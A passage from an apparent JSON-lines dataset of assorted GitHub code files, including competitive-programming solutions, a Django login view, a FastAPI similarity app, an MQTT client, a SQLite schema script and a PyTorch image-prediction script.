score_minimum_for_rome\n","repo_name":"StartupsPoleEmploi/labonneboite","sub_path":"labonneboite/common/scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"18"} +{"seq_id":"19337562924","text":"x1, y1, x2, y2 = map(int, input().split())\nx3, y3, x4, y4 = map(int, input().split())\np1 = [x1, y1]\np2 = [x2, y2]\np3 = [x3, y3]\np4 = [x4, y4]\n\n#평행하면서, 두 선분이 하나의 직선에 있으면서 만나지 않는 상황 배제\nif min(x1, x2) > max(x3, x4) or min(x3, x4) > max(x1, x2) or min(y1, y2) > max(y3, y4) or min(y3, y4) > max(y1, y2):\n print(0)\n quit()\n\ndef ccw(p1, p2, p3): #외적 -> 양수면 회전 방향 반시계 / 음수면 시계\n v1 = [p2[0] - p1[0], p2[1] - p1[1]]\n v2 = [p3[0] - p2[0], p3[1] - p2[1]]\n return v1[0] * v2[1] - v1[1] * v2[0]\n\n\na = ccw(p1, p2, p3) * ccw(p1, p2, p4)\nb = ccw(p3, p4, p1) * ccw(p3, p4, p2)\n\nif a <= 0 and b <= 0: #점 두 군데를 살펴보았을 때 모두 ccw가 +/-로 다른 방향으로 나왔다면 + 평행한데 일치\n print(1) #만난다.\nelse:\n print(0)","repo_name":"Youngseo-Jeon0313/baekjoon","sub_path":"백준17387.py","file_name":"백준17387.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23014935572","text":"# -*- coding: utf-8 -*-\n\"\"\"\n[Martinez-Gil2023d] Framework to Automatically Determine the Quality of Open Data Catalogs, arXiv preprint 
arXiv:2307.15464, 2023\n\n@author: Jorge Martinez-Gil\n\"\"\"\nimport sys\nfrom datetime import datetime, timedelta\nfrom rdflib import Graph, RDF, Namespace\n\n# Define some RDF prefixes\ndcat = Namespace(\"http://www.w3.org/ns/dcat#\")\nfoaf = Namespace(\"http://xmlns.com/foaf/0.1/\")\nrdf = Namespace(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\")\ndcterms = Namespace(\"http://purl.org/dc/terms/\")\n\ndef check_timeliness(rdf_data):\n \"\"\"\n Checks the timeliness of an RDF data file containing a DCAT catalog.\n\n Args:\n rdf_data (str): The RDF data as a string.\n\n Returns:\n bool: True if the catalog is timely, False otherwise.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n \n # Get the modified date of the catalog\n modified_date = None\n for s, p, o in graph.triples((None, RDF.type, dcat.Catalog)):\n for s2, p2, o2 in graph.triples((s, dcterms.modified, None)):\n modified_date = o2\n break\n break\n \n # Check if the modified date is within the last year\n if modified_date:\n modified_date = datetime.strptime(modified_date, '%Y-%m-%d')\n one_year_ago = datetime.now() - timedelta(days=365)\n if modified_date > one_year_ago:\n return True\n \n return False\n\n\"\"\"\nProgram that checks the timeliness of a DCAT catalog.\n\nUsage: python check_timeliness.py filepath\n\"\"\"\ndef main():\n\n # Get path to RDF data file from command line argument\n if len(sys.argv) < 2:\n print(\"Usage: python check_timeliness.py filepath\")\n sys.exit(1)\n\n rdf_data_path = sys.argv[1]\n\n # Load RDF data from file\n with open(rdf_data_path, \"r\", encoding=\"utf-8\") as f:\n rdf_data = f.read()\n\n result = check_timeliness(rdf_data)\n print(f\"The timeliness {rdf_data_path} is {result}.\")\n \nif __name__ == \"__main__\":\n main()","repo_name":"jorge-martinez-gil/dataq","sub_path":"check_timeliness.py","file_name":"check_timeliness.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42115221384","text":"from itertools import combinations\nn = int(input())\ninplist = []\nfor i in range(n):\n inplist.append(int(input()))\n\nresult = []\noutset = set()\noutlist = list(combinations(inplist, 3))\n\nfor comb in outlist:\n sum1 = 0\n for i in range(len(comb)):\n sum1 += comb[i]\n if(sum1 == 0 and set(comb) not in outset):\n outset.add(comb)\n result.append(list(comb))\n\nprint(outset)","repo_name":"MdSohel0706/dailywork","sub_path":"MCS_0058_Sohel_Core_Python/_50_HACKERRANK_PROBLEMS/_06_iter3.py","file_name":"_06_iter3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8309692890","text":"import requests, json\nfrom config import config\n\nPAGE_ACCESS_TOKEN = config[\"Token\"]\n\ndef list_admin_rep(sender_id, user, text):\n params = {\"access_token\": PAGE_ACCESS_TOKEN}\n headers = {\"Content-Type\": \"application/json\"}\n data = json.dumps({\n \"recipient\":{\n \"id\": sender_id\n },\n \"message\":{\n \"attachment\":{\n \"type\":\"template\",\n \"payload\":{\n \"template_type\":\"button\",\n \"text\": text,\n \"buttons\":[\n {\n \"type\":\"postback\",\n \"title\":\"Chấp nhận\",\n \"payload\": f\"accept{user}\"\n }, \n {\n \"type\":\"postback\",\n \"title\":\"Từ chối\",\n \"payload\": f\"refuse{user}\"\n }\n ]\n } \n }\n }\n })\n\n requests.post(\"https://graph.facebook.com/v2.6/me/messages\",params=params, headers=headers, 
data=data)","repo_name":"Nguyen3006-IT/SmartStudyAI","sub_path":"Action/list_admin_rep.py","file_name":"list_admin_rep.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30481046632","text":"# Import required module\nfrom texttable import Texttable\n\nclass Board:\n\tdef __init__(self, rows, cols):\n\t\tself.rows = rows\n\t\tself.cols = cols\n\t\tself.board = [[0 for j in range(self.cols)] for i in range(self.rows)]\n\n\t@property\n\tdef board_get(self):\n\t\treturn self.board\n\n\tdef change_elem_in_board(self, row, col, elem):\n\t\tself.board[row][col] = elem\n\n\tdef __str__(self):\n\t\ttable = Texttable()\n\t\tcreate_header = ['X']\n\t\tfor i in range(self.cols):\n\t\t\tcreate_header.append(chr(ord('A') + i)) #ord('A')-codul ascii, adica 65, +i=+cat e i, si chr(ord('A')+i) imi da B/C...etc\n\t\ttable.header(create_header)\n\t #asa pun headeru, adica linia de sus cu literele\n\t\t#X e neutru, apoi deasupra fiecarei coloane a matricei punem litera, de aia parcurgem self.cols\n\t\tfor i in range(self.rows):\n\t\t\tcurrent_row = self.board[i]\n\t\t\tfor j in range(self.cols):\n\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\tcurrent_row[j] = ' ' #asta e o singura lista, e un singur rand, si j e indexul ei\n\t\t\t\t\t#eu asa schimb elem din matrice, in loc sa scriu self.board[i][j] = ' ', adica matricea de rand si coloana\n\t #eu iau direct randul pe care sunt acum de coloana. e same shit oricum, dar fac asa ca sa imi schimbe\n\t\t\t #doar in randul pe care vreau eu sa il pun in textable, nu schimba si in matrice. acolo ramane 0\n\t\t\t\t\t#e doar o chestie de afisaj\n\t\t\t\t\t#toate operatiile de schimbare de elemente pe care le fac le fac de fapt, le fac pe matrice\n#si nu pe texttable. 
texttable ul doar ia fiecare linie din matrice si o afiseaza sub forma de texttable\n#in el nu prelucrez nimic, decat ce tine de nivel de afisaj\n\t\t\ttable.add_row([i] + self.board_get[i]) #tu in text table poti adauga doar liste, de asta adaug rand cu rand din matrice\n\t\t\t#am fc [i] + self.board[i] ca sa imi puna coloana cu 1,2,3...aia din cea mai stanga si langa ea concatenat randul\n\t\t #la care suntem\n\n\t\treturn table.draw()\n\n#bun, efectiv m am complicat, p","repo_name":"betina17/University","sub_path":"First Year/Semester 1/Fundamentals of Programming/theory and experiments/texttable/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"ro","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23072684416","text":"class Solution(object):\n def updateMatrix(self, matrix):\n \n row_count = len(matrix)\n col_count = len(matrix[0])\n for i in range(row_count):\n for j in range(col_count):\n if matrix[i][j] > 0:\n matrix[i][j] = self.shortest_path_to_zero(matrix, i, j, row_count, col_count)\n return matrix\n def shortest_path_to_zero(self, matrix, row_start, col_start, row_count, col_count):\n \n # queues are kept in sync\n row_queue = [row_start]\n col_queue = [col_start]\n \n row_directions = [-1, 0, 1, 0]\n col_directions = [0, 1, 0, -1]\n \n level_count = 0\n \n while len(row_queue) > 0:\n size = len(row_queue)\n \n while size > 0:\n curr_row = row_queue.pop(0)\n curr_col = col_queue.pop(0)\n size -= 1\n for i in range(len(row_directions)):\n next_row = curr_row + row_directions[i]\n next_col = curr_col + col_directions[i]\n if next_row < 0 or next_row >= row_count: continue\n if next_col < 0 or next_col >= col_count: continue\n \n if matrix[next_row][next_col] is 0: \n return level_count + 1\n else:\n row_queue.append(next_row)\n col_queue.append(next_col)\n \n level_count += 1\n \n return -1\n \n \n \n \n \n \n \n","repo_name":"stephenhuh/competitive-programming","sub_path":"graphs/01_matrix.py","file_name":"01_matrix.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74608272998","text":"import sqlite3\nfrom sqlite3 import Error\n\n\ndef sql_connection():\n try:\n con = sqlite3.connect('SQL_LoadLog.db')\n return con\n print(\"Соединение работает\")\n except Error:\n print(Error)\n\n\n\"FOREIGN KEY (id_SubFaculties) REFERENCES SubFaculties (id_SubFaculties) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Lect) REFERENCES Lecturer (id_Lect) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Lect) REFERENCES Lecturer (id_Lect) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Sub) REFERENCES Subject (id_Sub) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_SubFaculties) REFERENCES SubFaculties (id_SubFaculties) ON DELETE CASCADE,\"\n\ndef sql_subfaculties(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE SubFaculties(\"\n \"id_SubFaculties int PRIMARY KEY,\"\n \"SubFacultiesName text,\"\n \"EmployeeList text,\"\n \"SalaryeEmployee text,\"\n \"GroupList text)\")\n\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(1, 'Кафедра вычислительных технологий', 'Шиян В.И.,Жук А.С.Приходько Т.А.', '50000-100000', '36,39') \"\n )\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(2, 'Кафедра информационных технологий', 'Гаркуша О.В.,Добровольская Н.Ю.,Михайличенко А.А.', '50000-100000','36,39')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(3,' Кафедра математического моделирования', 
'Евдокимов А.А.,Истомин Н.К.,Рубцов С.Е.', '50000-10000', '37,38')\"\n )\n con.commit()\n\n\ndef sql_lecturer(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Lecturer(\"\n \"id_Lect int PRIMARY KEY,\"\n \"id_SubFaculties int,\"\n \"FullNameLecturer text,\"\n \"ScienceDegree text,\"\n \"SubFaculties text,\"\n \"Discipline text,\"\n \"WorkExperience int)\")\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \"\n \"VALUES(11,1,'Шиян Валерий Игоревич','Преподаватель','Кафедра вычислительных технологий','Интерпретируемые языки программирования',5)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \" \n \"VALUES(12,2,'Гаркуша Олег Васильевич','Доцент','Кафедра информационных технологий','Операционные системы',42)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \"\n \"VALUES(13,3,'Евдокимов Александр Александрович','Доцент','Кафедра математического моделирования','Управление информацией',5)\"\n )\n con.commit()\n\n\ndef sql_subject(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Subject(\"\n \"id_Sub int PRIMARY KEY,\"\n \"id_Lect int,\"\n \"TypeSubject text)\")\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \" VALUES(11,11,'Лекция')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \"VALUES(22,12,'Лабораторная работа')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \"VALUES(10,13,'Лекция')\"\n )\n con.commit()\n\n\ndef sql_lesson(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Lesson(\"\n \"id_Lect int,\"\n \"id_Sub int,\"\n \"NumberOfGroups int,\"\n \"NumberOfStudents int)\")\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(11,22,1,15)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(12,11,3,50)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(13,10,1,15)\"\n )\n con.commit()\n\n\ndef sql_loadlog(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE LoadLog(\"\n \"id_JournalPersonnelNumber int PRIMARY KEY,\"\n \"id_SubFaculties int,\"\n \"NameSubject text,\"\n \"NumberOfHours int,\"\n \"NumberOfGroups int)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(1,2,'Интерпретируемые языки программирования',4,4)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(2,1,'Информационная безопасность',2,4)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO LoadLog \"\n \"VALUES(3,3,'Управление информацией',6,4)\"\n )\n con.commit()\n\ndef select(con):\n cursorObj = con.cursor()\n cursorObj.execute(\"SELECT name FROM sqlite_master WHERE type='table'\")\n table = cursorObj.fetchall()\n\n tablesList = []\n for tab in table:\n tablesList.append(tab[0])\n\n for listItem in tablesList:\n print(f\"Вывод содержимого таблицы {listItem}\")\n cursorObj.execute(f'SELECT * from {listItem}')\n [print(row) for row in cursorObj.fetchall()]\n\n\n#con = sql_connection()\n#sql_subfaculties(con)\n#sql_lecturer(con)\n#sql_subject(con)\n#sql_lesson(con)\n#sql_loadlog(con)\n\n#delete,update","repo_name":"BaevaDiana/CGI","sub_path":"DB.py","file_name":"DB.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28215066024","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login as lin, logout as lout\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, render\n\nfrom .forms import ConfirmStaffRegistrationForm, LoginForm, StaffRegistrationForm\n\n\ndef 
login(request):\n template_name = 'accounts/login.html'\n form = LoginForm\n\n if request.method == 'POST':\n form = form(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n if user.is_active:\n lin(request, user)\n messages.success(request, f'Successfully logged in as {user.username}', 'alert-success')\n return redirect('product:index')\n else:\n messages.error(request, 'Your account is inactive. Please contact your system administrator.', 'alert-danger')\n else:\n messages.error(request, 'Incorrect username or password. Please try again.', 'alert-danger')\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n else:\n messages.error(request, 'The form contains some errors. Please try again.', 'alert-danger')\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n else:\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n\n\n# under construction\n@login_required()\ndef register_staff(request):\n template_name = 'accounts/register_staff.html'\n form = StaffRegistrationForm\n\n if request.method == 'POST':\n form = form(data=request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n else:\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n\n\n# under construction\n@login_required()\ndef confirm_staff_registration(request):\n template_name = 'accounts/confirm_staff_registration.html'\n\n\n@login_required(redirect_field_name=None)\ndef logout(request):\n lout(request)\n messages.success(request, 'Successfully logged out.')\n return redirect('accounts:login')\n","repo_name":"JKAkabo/ngeo","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14691994962","text":"\r\n#installing packages\r\nimport sys \r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\n\r\n\r\n#Collecting the page\r\npage = requests.get('https://freedomarchives.org/La_Lucha_Continua/Martin_Luther_King.html')\r\n#print(page)\r\nsoup = BeautifulSoup(page.text, 'html.parser')\r\n\r\n\r\ntext = str(soup.find_all('strong'))\r\ntext = text.replace(\"<strong>\",\"\")\r\ntext = text.replace(\"</strong>\",\"\")\r\n\r\nmy_dict = {\r\n \"person\" : \"Martin Luther King Jr\",\r\n \"message\" : text\r\n}\r\n#print(my_dict)\r\n\r\nd = json.dumps(my_dict)\r\n#print(d)\r\nsys.exit(d)\r\n\r\n","repo_name":"rene415/MuARals","sub_path":"muARals.py","file_name":"muARals.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72168240419","text":"from fastapi import FastAPI, Form, Request\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nfrom api import apiRouter\nfrom models import *\nfrom fastapi import status\n\n\napp = FastAPI(\n title=\"Check Similarity API\",\n description=\"Measure the similarity between the two texts.\",\n debug=True\n)\n\napp.include_router(apiRouter)\n\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\ntemplates = Jinja2Templates(directory=\"templates\")\n\n\n@app.get(\"/\", include_in_schema=False)\nasync def index(request: Request):\n 
return templates.TemplateResponse("index.html", {"request": request})\n\n\n@app.post(\"/compare\", include_in_schema=False)\nasync def compare(\n request: Request,\n text1: str = Form(...),\n text2: str = Form(...),\n similarity: SimilarityMethod = Form(...),\n vectorizing: VectorizingMethod = Form(...)\n):\n input = Input(text1=text1, text2=text2,\n similarity=similarity, vectorizing=vectorizing)\n\n try:\n result = input.compare()\n except Exception:\n return RedirectResponse(\"/?error=true\", status_code=status.HTTP_302_FOUND)\n\n return templates.TemplateResponse(\"result.html\", {\"request\": request, \"result\": result})\n","repo_name":"binaenaleyh/checksimilarity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}
+{"seq_id":"71296778018","text":"x, y = list(map(int, input().split()))\n\n#takes in input\narr = []\nfor i in range (x):\n arr.append(input())\n\n#finds the empty columns between moves\ncount = 1\nfor j in range (y):\n line = [arr[i][j] for i in range(x) if arr[i][j] != \"_\"]\n if (len(line) == 0):\n count += 1\n\nprint (count)","repo_name":"lullebulle1/Kattis","sub_path":"EpigDanceOff/Python Solution.py","file_name":"Python Solution.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"7587702491","text":"from number_to_func import NumberToFunc;\nimport os;\n\ndef ClearConsole():\n os.system('cls' if os.name in ('nt', 'dos') else 'clear');\n\n\ndef HienThiDanhSachChucNang():\n print(\"Nhap vao lua chon cua ban:\");\n print(\"0: Thoat chuong trinh\");\n print(\"1: Them Todo moi\");\n print(\"2: Xoa Todo o vi tri la\");\n print(\"3: Cap nhat Todo o vi tri\");\n print(\"4: Hoan thanh Todo o vi tri\");\n print(\"5: In toan bo Todo dang co\");\n print(\"6: In toan bo Todo da hoan thanh\");\n print(\"7: In toan bo Todo chua hoan thanh\");\n\nwhile(True):\n ClearConsole();\n HienThiDanhSachChucNang();\n # Read the user's choice\n try:\n luaChon = int(input(\"Lua chon cua ban: \"));\n if luaChon >= 0 and luaChon <= 7:\n luaChonFunc = NumberToFunc(luaChon);\n if luaChonFunc is not None:\n luaChonFunc();\n else:\n break;\n else:\n print(\"Lua chon chuc nang khong dung\");\n input();\n continue\n except ValueError:\n print(\"Lua chon chuc nang khong dung\");\n input();\n continue\n\n\nprint(\"Todo Console da thoat\");","repo_name":"namhnz/todo-console-python","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"27937883493","text":"class Solution:\n def searchMatrix(self, matrix: [[int]], target: int) -> bool:\n \"\"\"\n The core idea is still binary search: treat the 2D array as a 1D array; the hard part is converting mid's index in the 1D array back into 2D indices\n row: mid // col\n column: mid % col\n :param matrix:\n :param target:\n :return:\n \"\"\"\n left = 0\n right = len(matrix) * len(matrix[0]) - 1\n m = len(matrix)\n n = len(matrix[0])\n\n while left <= right:\n mid = left + (right - left) // 2\n new_mid_row = mid // n\n new_mid_column = mid % n\n\n if matrix[new_mid_row][new_mid_column] == target:\n return True\n\n if matrix[new_mid_row][new_mid_column] < target:\n left = mid + 1\n else:\n right = mid - 1\n\n return False","repo_name":"jsheng0901/leetcode","sub_path":"Two 
pointers/74.py","file_name":"74.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36618696282","text":"n = int(input())\r\nnums = list(map(int, input().split()))\r\nnums = sorted(nums)\r\n\r\nmax_diff = int((nums[-1] - nums[0])/2)\r\n\r\nmax_count = -1\r\n\r\nfor center in range(nums[0]+1, nums[-1]):\r\n count = 0\r\n\r\n for k in range(1, max_diff+1):\r\n if (center-k) in nums and (center+k) in nums:\r\n count += 1\r\n \r\n max_count = max(max_count, count)\r\n\r\nprint(max_count)","repo_name":"jisoo920/codetree-TILs","sub_path":"231213/등차수열/arithmetic-sequence.py","file_name":"arithmetic-sequence.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40680631338","text":"respuesta = input(\"Coloca una frase y una letra, para contar el numero de veces que aparece: \\n\"+\n \"Formato: FRASE - LETRA\\n\")\nc = 0\nfrase = respuesta.split(\" - \")[0]\nletra = respuesta.split(\" - \")[1].strip() \nc = 0\nfor i in frase:\n if(i == letra):\n c += 1\n \nprint(\"Frase: \" + frase + \", Numero de repeticiones: \" + f\"{c}\")\n\n#apariciones = frase.count(letra)","repo_name":"JonnyJaccob/MultiParadigma","sub_path":"Unidad1/Practicas1Equipos/PracticaE4Bucles.py","file_name":"PracticaE4Bucles.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36876694179","text":"\"\"\" specific mqtt client \"\"\"\nfrom mqttc_configurator import mqttc_configurator\n\n\nTOPIC_DEVELOPMENT = 'development/#'\nTOPIC_RESEARCH = 'research/#'\n\ndef on_message_development(client, userdata, msg):\n \"\"\" handle message on topic develop \"\"\"\n print(\"processing development\")\n\ndef on_message_research(client, userdata, msg):\n \"\"\" handle message on topic research \"\"\"\n print(\"processing research\")\n\ndef loop():\n \"\"\" perform the loop \"\"\"\n print('loop')\n\ndef setup():\n \"\"\" configure this mqtt client \"\"\"\n config = mqttc_configurator(\n client_id='mqttc2',\n subscribe_to=[(TOPIC_DEVELOPMENT, 1), (TOPIC_RESEARCH, 2)],\n loop_delay=60.0\n )\n\n client = next(config)\n client.message_callback_add(TOPIC_DEVELOPMENT, on_message_development)\n client.message_callback_add(TOPIC_RESEARCH, on_message_research)\n config.send(loop)\n # config.send(None)\n\nsetup()\n","repo_name":"akkerman/docker-experiments","sub_path":"mqtt-client/client/mqttc2.py","file_name":"mqttc2.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22965480234","text":"# Imports here\r\nimport time\r\nimport torch\r\nfrom torch import nn, optim\r\nimport helper\r\nfrom torchvision import datasets, transforms\r\nimport numpy as np\r\nimport pandas as pd\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nimport ast\r\nfrom PIL import Image\r\nimport torchvision.transforms as transforms\r\nfrom torch.autograd import Variable\r\nimport torchvision.models as models\r\nfrom torch import __version__\r\nfrom get_input_args import get_input_args\r\n\r\n# --------------------------------------------------------\r\n# args input\r\nargs = get_input_args()\r\ndir = args.dir\r\narch = args.arch\r\nprocess = args.process\r\nlearn_rate = float(args.learn_rate)\r\nlayers = int(args.layers)\r\nepochs = int(args.epochs)\r\ngpu = args.gpu\r\n# 
--------------------------------------------------------\r\n# Models\r\nresnet18 = models.resnet18()\r\nalexnet = models.alexnet()\r\nvgg16 = models.vgg16()\r\n\r\n# Models dict\r\nmodels = {'resnet': resnet18, 'alexnet': alexnet, 'vgg': vgg16}\r\n\r\n# apply model to input\r\nmodel = models[arch]\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.SGD(model.parameters(), lr=learn_rate)\r\n# --------------------------------------------------------\r\n\r\ndef view_class(probes, names):\r\n ''' Function for viewing an image and it's predicted classes.\r\n '''\r\n probes = probes.cpu().data.numpy().squeeze()\r\n names['probes'] = probes\r\n highest = names.nlargest(5, ['probes'])[['probes','flower_name']]\r\n names = names.sort_values(by=['probes'])\r\n \r\n x = highest['probes']\r\n y = highest['flower_name']\r\n\r\n plt.figure(figsize=(15,5));\r\n plt.barh(y=y, width=x*100);\r\n plt.yticks(size=14);\r\n\r\n return names, highest\r\n\r\ndef imshow(image, ax=None, title=None):\r\n \"\"\"Imshow for Tensor.\"\"\"\r\n \r\n # PyTorch tensors assume the color channel is the first dimension\r\n # but matplotlib assumes is the third dimension\r\n image = image.permute(2, 3, 1, 0).squeeze(3);\r\n \r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = image*std + mean\r\n \r\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\r\n image = np.clip(image, 0, 1);\r\n \r\n plt.imshow(image);\r\n\r\n\r\ndef process_image(model, image_path):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n # TODO: Process a PIL image for use in a PyTorch model\r\n # load the image\r\n image_PIL = Image.open(image_path) if isinstance(image_path, str) else image_path\r\n\r\n # define transforms\r\n transform = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n \r\n # preprocess the image\r\n image_tensor = transform(image_PIL)\r\n \r\n # resize the tensor (add dimension for batch)\r\n image_tensor.unsqueeze_(0)\r\n \r\n # address tensor as output not wrapper\r\n image_tensor.requires_grad_(False)\r\n\r\n # apply model to input\r\n model = model\r\n\r\n # puts model in evaluation mode\r\n # instead of (default)training mode\r\n model = model.eval()\r\n\r\n output = model(image_tensor)\r\n\r\n # return index corresponding to predicted class\r\n pred_idx = output.data.numpy().argmax()\r\n \r\n return image_tensor\r\n\r\n\r\ndef predict(model, image_path, names):\r\n # model.eval() is a kind of switch for some specific\r\n # layers/parts of the model that behave differently \r\n # during training and inference (evaluating) time.\r\n \r\n model.eval()\r\n \r\n probs = 0\r\n \r\n image = process_image(model, image_path)\r\n imshow(image, ax=None, title=None)\r\n \r\n label = image_path.split('/')[-2]\r\n\r\n # Calculate the class probabilities (softmax) for image\r\n \r\n with torch.no_grad():\r\n output = model.forward(image)\r\n\r\n # Calculating Accuracy\r\n _, preds = torch.max(output.data, 1)\r\n Correct = \"Correct\" if (preds == label) else \"Incorrect\"\r\n\r\n probs = torch.exp(output)\r\n # Plot the image and probabilities\r\n names, highest = view_class(probs, names)\r\n Actual_Name = names.loc[names['Id'] == int(label)+1]['flower_name'].item()\r\n Pred_Name = highest.nlargest(1, 
'probes')['flower_name'].item()\r\n Accuracy = np.round(100*highest.nlargest(1, 'probes')['probes'].item(), decimals=2)\r\n\r\n\r\n print(\"# Prediction is: {} \\n# Accuracy: {}%\".format(Correct, Accuracy))\r\n print(\"# Prediction Label: {} \\n# Actual Label: {}\".format(Pred_Name, Actual_Name))\r\n\r\n return probs\r\n\r\n\r\ndef load_model(model, path):\r\n # Checking if GPU is available\r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n # initialize the model class before loading the model\r\n classifier = model\r\n\r\n # Load the model checkpoint\r\n checkpoint = torch.load(path, map_location=device)\r\n\r\n # Load model weights state\r\n classifier.load_state_dict(checkpoint['Classifier_state'])\r\n\r\n # Load trained optimizer state\r\n optimizer.load_state_dict(checkpoint['Optimizer_state'])\r\n\r\n # Load number of previous epochs\r\n epochs = checkpoint['Epoch']\r\n\r\n # load the criterion\r\n criterion = checkpoint['Loss_Function']\r\n\r\n return classifier, optimizer, epochs, criterion\r\n\r\n\r\n\r\n\r\n","repo_name":"KarimElshetihy/Custom-Dog-Breed-Classifier-using-PyTorch","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"46977240811","text":"import numpy as np\n\ndef kalman_smooth(obs,eps,params):\n\n (M,Q,R) = obs\n\n x = np.zeros(len(M))\n x_k_ = np.zeros(len(M))\n x_k = np.zeros(len(M))\n sig_k_ = np.zeros(len(M))\n sig_k = np.zeros(len(M))\n\n\n gamma = params[0]\n phi = params[1]\n sigv = params[2]\n delta = params[3]\n h = params[4]\n sigg = params[5]\n mu = params[6]\n eta = params[7]\n psi = params[8]\n g = params[9]\n c = params[10]\n Del = params[11]\n J = params[12]\n\n for i in range(len(x)):\n # update one step estimates\n x_k_[i] = gamma + phi* x_k[i-1]\n 